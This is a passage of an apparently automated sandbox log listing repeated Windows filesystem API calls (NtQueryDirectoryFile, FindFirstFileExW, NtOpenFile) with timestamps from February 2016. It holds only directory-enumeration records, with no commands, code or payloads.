17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,775", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,845", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,845", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,845", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,845", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,845", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,845", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,865", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,945", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,955", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,965", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,065", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", 
"api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:37,075", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,075", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,116", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,116", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,116", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,186", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": 